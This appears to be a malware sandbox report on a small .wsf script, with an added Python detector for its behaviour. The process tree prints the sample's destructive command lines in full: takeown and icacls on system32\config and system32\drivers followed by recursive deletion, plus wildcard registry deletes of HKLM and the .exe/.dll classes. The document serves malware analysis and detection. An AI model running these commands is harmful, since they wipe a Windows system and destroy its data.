Analysis
Max time kernel: 46s
Max time network: 48s
Platform: windows10-2004_x64
Resource: win10v2004-20240802-en
Resource tags: arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
Submitted: 15-08-2024 21:42
Static task: static1
Behavioral task: behavioral1
Sample: code.wsf
Resource: win7-20240729-en
General
Target: code.wsf
Size: 3KB
MD5: 57a8ed12915b612b81ec573f56394818
SHA1: f834294e6d6a7150da076670825857960df8a7a2
SHA256: 0461ce4eb37d43545491e5d2a9c42b673669378cba5cfa141be1cc0280dfdedf
SHA512: 2bdfeff4bd4ce78baeeddca3be307c1ca263034703e4bbccbe360b9cc32c43df0fa2279e893b4ebbf3a27832de6d575dff6297b4ae16dba628e7c7115897ca68
Malware Config
Signatures

Possible privilege escalation attempt (4 IoCs)
  PID 4828 icacls.exe
  PID 4868 icacls.exe
  PID 4672 takeown.exe
  PID 2996 takeown.exe

Checks computer location settings (2 TTPs, 2 IoCs)
  Looks up country code configured in the registry, likely geofence.
  Key value queried: \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation (cmd.exe)
  Key value queried: \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation (WScript.exe)

Modifies file permissions (1 TTP, 4 IoCs)
  PID 4868 icacls.exe
  PID 4672 takeown.exe
  PID 2996 takeown.exe
  PID 4828 icacls.exe

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).

Modifies registry class (1 IoC)
  Key created: \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings (cmd.exe)

Modifies registry key (1 TTP, 1 IoC)

Runs regedit.exe (1 IoC)
  PID 4116 regedit.exe

Suspicious behavior: GetForegroundWindowSpam (1 IoC)
  PID 4116 regedit.exe

Suspicious use of AdjustPrivilegeToken (1 IoC)
  Token: SeTakeOwnershipPrivilege, PID 2996 takeown.exe

Suspicious use of WriteProcessMemory (20 IoCs; each parent/child pair was recorded twice)
  PID 3888 cmd.exe wrote to memory of PID 3364 WScript.exe (x2)
  PID 3364 WScript.exe wrote to memory of PID 2708 cmd.exe (x2)
  PID 3364 WScript.exe wrote to memory of PID 2712 cmd.exe (x2)
  PID 2708 cmd.exe wrote to memory of PID 4672 takeown.exe (x2)
  PID 2712 cmd.exe wrote to memory of PID 2996 takeown.exe (x2)
  PID 2708 cmd.exe wrote to memory of PID 4828 icacls.exe (x2)
  PID 2712 cmd.exe wrote to memory of PID 4868 icacls.exe (x2)
  PID 3364 WScript.exe wrote to memory of PID 1540 reg.exe (x2)
  PID 3364 WScript.exe wrote to memory of PID 2604 reg.exe (x2)
  PID 3364 WScript.exe wrote to memory of PID 3324 reg.exe (x2)
Processes (indentation shows process depth)

C:\Windows\system32\cmd.exe (PID 3888)
    cmd /c "copy C:\Users\Admin\AppData\Local\Temp\code.wsf C:\Users\Admin\AppData\Local\Temp\code.wsf.vbs && start C:\Users\Admin\AppData\Local\Temp\code.wsf.vbs"
    - Checks computer location settings
    - Modifies registry class
    - Suspicious use of WriteProcessMemory

  C:\Windows\System32\WScript.exe (PID 3364)
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\code.wsf.vbs"
      - Checks computer location settings
      - Suspicious use of WriteProcessMemory

    C:\Windows\System32\cmd.exe (PID 2708)
        "C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&1
        - Suspicious use of WriteProcessMemory

      C:\Windows\system32\takeown.exe (PID 4672)
          takeown /f c:\windows\system32\config\*
          - Possible privilege escalation attempt
          - Modifies file permissions

      C:\Windows\system32\icacls.exe (PID 4828)
          icacls c:\windows\system32\config\* /grant everyone:(f)
          - Possible privilege escalation attempt
          - Modifies file permissions

    C:\Windows\System32\cmd.exe (PID 2712)
        "C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&1
        - Suspicious use of WriteProcessMemory

      C:\Windows\system32\takeown.exe (PID 2996)
          takeown /f c:\windows\system32\drivers\*
          - Possible privilege escalation attempt
          - Modifies file permissions
          - Suspicious use of AdjustPrivilegeToken

      C:\Windows\system32\icacls.exe (PID 4868)
          icacls c:\windows\system32\drivers\* /grant everyone:(f)
          - Possible privilege escalation attempt
          - Modifies file permissions

    C:\Windows\System32\reg.exe (PID 1540)
        "C:\Windows\System32\reg.exe" delete HKCR\*.dll /f

    C:\Windows\System32\reg.exe (PID 2604)
        "C:\Windows\System32\reg.exe" delete HKCR\*.exe /f

    C:\Windows\System32\reg.exe (PID 3324)
        "C:\Windows\System32\reg.exe" delete HKLM\* /f
        - Modifies registry key

C:\Windows\regedit.exe (PID 4116)
    "C:\Windows\regedit.exe"
    - Runs regedit.exe
    - Suspicious behavior: GetForegroundWindowSpam
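Added example, not part of the sandbox report and not code from the sample: a small Python detector that walks process-creation events modelled on the process tree above and flags the chain the report shows (takeown, then icacls /grant everyone:(f), then del /s /q against system32\config and system32\drivers), the wildcard reg delete calls, and the copy of a .wsf to a .wsf.vbs before launch. The "Possible privilege escalation attempt" label is the sandbox's generic name for takeown/icacls on system paths; in this run the sample already executes from an Admin profile, and system32\config holds the SAM, SECURITY, SOFTWARE and SYSTEM hives, so the actionable detection is the sequence as a whole rather than any single tool. The events below are constructed from the command lines and PIDs in this report; the parent PID 1 for the top-level cmd.exe and the final benign icacls call (PID 5000) are assumptions added for contrast.

```python
import re
from collections import defaultdict

# Directories an interactive user has no legitimate reason to take ownership of,
# make world-writable, or recursively delete.
PROTECTED_DIRS = (r"\windows\system32\config", r"\windows\system32\drivers")

# Registry deletes that target a hive root or every .exe/.dll class, as in the report.
WILDCARD_REG_TARGETS = {r"hklm\*", r"hkcr\*.exe", r"hkcr\*.dll"}

# Finds the tool name at the head of a command segment, with or without a quoted
# full path, e.g. 'takeown /f ...' or '"c:\windows\system32\reg.exe" delete ...'.
TOOL_RE = re.compile(r'(?:^|[\\\s"])(takeown|icacls|del|reg)(?:\.exe)?"?\s+(.*)$')

# Constructed events (parent PID, PID, image, command line) modelled on the report's
# process tree. Parent PID 1 for the root and the benign PID 5000 entry are assumed.
EVENTS = [
    (1, 3888, r"C:\Windows\system32\cmd.exe",
     r'cmd /c "copy C:\Users\Admin\AppData\Local\Temp\code.wsf C:\Users\Admin\AppData\Local\Temp\code.wsf.vbs && start C:\Users\Admin\AppData\Local\Temp\code.wsf.vbs"'),
    (3888, 3364, r"C:\Windows\System32\WScript.exe",
     r'"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\code.wsf.vbs"'),
    (3364, 2708, r"C:\Windows\System32\cmd.exe",
     r'"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&1'),
    (2708, 4672, r"C:\Windows\system32\takeown.exe", r"takeown /f c:\windows\system32\config\*"),
    (2708, 4828, r"C:\Windows\system32\icacls.exe", r"icacls c:\windows\system32\config\* /grant everyone:(f)"),
    (3364, 2712, r"C:\Windows\System32\cmd.exe",
     r'"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&1'),
    (2712, 2996, r"C:\Windows\system32\takeown.exe", r"takeown /f c:\windows\system32\drivers\*"),
    (2712, 4868, r"C:\Windows\system32\icacls.exe", r"icacls c:\windows\system32\drivers\* /grant everyone:(f)"),
    (3364, 1540, r"C:\Windows\System32\reg.exe", r'"C:\Windows\System32\reg.exe" delete HKCR\*.dll /f'),
    (3364, 2604, r"C:\Windows\System32\reg.exe", r'"C:\Windows\System32\reg.exe" delete HKCR\*.exe /f'),
    (3364, 3324, r"C:\Windows\System32\reg.exe", r'"C:\Windows\System32\reg.exe" delete HKLM\* /f'),
    # Assumed benign ACL change on a user file: must not be flagged.
    (1, 5000, r"C:\Windows\system32\icacls.exe", r"icacls C:\Users\Admin\Documents\report.docx /grant Admin:(r)"),
]


def classify(cmdline):
    """Return sorted tags for the destructive or suspicious actions in one command line."""
    tags = set()
    low = cmdline.lower()
    for segment in low.split("&&"):          # cmd.exe chains are split on &&
        m = TOOL_RE.search(segment.strip())
        if not m:
            continue
        tool, args = m.groups()
        protected = any(d in args for d in PROTECTED_DIRS)
        if tool == "takeown" and protected:
            tags.add("takeown_protected_dir")
        elif tool == "icacls":
            if "everyone:(f)" in args.replace(" ", ""):   # world-writable grant
                tags.add("icacls_everyone_full")
            if protected:
                tags.add("acl_change_protected_dir")
        elif tool == "del" and protected and "/s" in args.split():
            tags.add("recursive_delete_protected_dir")
        elif tool == "reg" and args.startswith("delete"):
            parts = args.split()
            if len(parts) > 1 and parts[1].strip('"') in WILDCARD_REG_TARGETS:
                tags.add("reg_delete_wildcard")
    # Script-host extension swap: the sample is copied from .wsf to .wsf.vbs before launch.
    if re.search(r"copy\s+\S+\.wsf\s+\S+\.wsf\.vbs", low):
        tags.add("wsf_renamed_to_vbs")
    return sorted(tags)


def score_tree(events):
    """Attribute each process's tags to its top-level ancestor and alert per tree."""
    parent_of = {pid: ppid for ppid, pid, _, _ in events}

    def root(pid):
        while parent_of.get(pid) in parent_of:   # climb until the parent is not an event
            pid = parent_of[pid]
        return pid

    tags_by_root = defaultdict(set)
    for _, pid, _, cmdline in events:
        tags_by_root[root(pid)].update(classify(cmdline))

    wipe_chain = {"takeown_protected_dir", "icacls_everyone_full", "recursive_delete_protected_dir"}
    alerts = {}
    for pid, tags in tags_by_root.items():
        if wipe_chain <= tags:
            alerts[pid] = "system-directory wipe chain"
        elif "reg_delete_wildcard" in tags:
            alerts[pid] = "wildcard registry delete"
    return dict(tags_by_root), alerts


if __name__ == "__main__":
    tags, alerts = score_tree(EVENTS)
    for pid, verdict in alerts.items():
        print(f"root PID {pid}: {verdict}; tags={sorted(tags[pid])}")
```

Correlating by top-level ancestor matters here: no single child process in the tree carries the whole chain, since takeown.exe, icacls.exe and the del built-in each run in their own process or inside cmd.exe, so a rule that only looks at one command line at a time sees three mildly suspicious events rather than one wipe.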
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 3KB
MD5: 57a8ed12915b612b81ec573f56394818
SHA1: f834294e6d6a7150da076670825857960df8a7a2
SHA256: 0461ce4eb37d43545491e5d2a9c42b673669378cba5cfa141be1cc0280dfdedf
SHA512: 2bdfeff4bd4ce78baeeddca3be307c1ca263034703e4bbccbe360b9cc32c43df0fa2279e893b4ebbf3a27832de6d575dff6297b4ae16dba628e7c7115897ca68

Filesize: 77B
MD5: 1fafd3091b9297603ea9989bed793089
SHA1: 03688ce88040e39d04ec4a182427cf0992c827d6
SHA256: 84a4fba54d165a54fdb5e5fff87530ebf488e5da855cadac11d54582858e67ac
SHA512: 8273cf8d90b26a8247e8ac0317c1266a5ae24ba82dffe5f8b7ca46cb5ab8746aaf1eea089a4a6c1a9c612bb7d6f69ea944ed55c113e4da01d4cf53ac8cd44571